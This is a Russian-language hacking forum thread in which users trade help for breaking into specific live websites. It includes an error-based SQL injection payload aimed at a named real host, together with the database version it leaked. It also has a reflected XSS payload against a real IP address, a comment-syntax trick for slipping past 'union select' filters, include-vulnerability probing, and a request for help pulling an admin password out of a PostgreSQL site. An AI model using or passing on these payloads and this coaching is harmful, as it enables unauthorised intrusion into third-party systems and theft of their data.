Konqi, спасибо. Я вчера таки спать лег )) А можно еще вопрос? В посте #18193 Tigger пишет: Слово union взято в комментарии, почему же оно выполняется? И правильно ли я понимаю, что на сайте стоит фильтр, не позволяющий выполнять "union select", а вот "/*!union*/ select" уже не подпадает под него?
ggaffoltern[antigoogle].ch/index2.php?content=index&path=content&print=2 Опять же инклуд. Как организовать читалку? --------- PHP: http://imakefood[antiggole].com/?sw=1[sql-code] WVS-ом насканил. Помогите раскрутить!
есть логи от mssql вида: INSERT INTO таблица (.....) values (.....); есть ли прога, в которую суешь эти логи, и она конвертит их в mysql ?
http://search.kgn.ru/?text=ololo Code: Warning: include(http:///?text=ololo) [function.include]: failed to open stream: operation failed in /var/www/search.kgn.ru/index.php on line 29 А самому не додуматься что тут "не так"? Просто в конфигах не прописано к какому хосту обращаться для осуществления поиска. Поиск там работает не на самом сайте а через сторонний сервис и там даже написано "Поиск осуществлен с использованием Яndex.Server.".
Имхо, это не скуля. Нужен админский доступ - заюзай XSS лучше Code: http://217.8.80.55/?m[search]&search_block_num=<ScRiPt>alert(/Its XSS, Baby/)</ScRiPt>
Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая: там фильтруются скобки, а вы навернека первым делом встевели что то типо version() вообщем вот ваше начало: а дальше хоть немножко напрегите свои извилены!
Code: https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and' version(): 5.0.67
Доброго здравия форумчане! В общем ищу где можно почитать про PostgreSQL Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю, Помогите убедить сайт. Leon2k Можешь обратиться в личку, всё что знаю расскажу!
Возможно, придётся поработать с выводом, чтото вроде Code: unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71) где %Visible_Col% - выводимая колонка в запросе всё зависит от случая
В любой статье по SQL-иньекциям. https://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html
insert into помогите с injection запрос вида log.php?ver=1.0.1.130' Ошибка при занесении информации в базу. 118 ******/log.php You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25 INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" } все параметры строковые, можно как то вставить union+select?
https://forum.antichat.ru/showpost.php?p=2582303&postcount=16413 Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
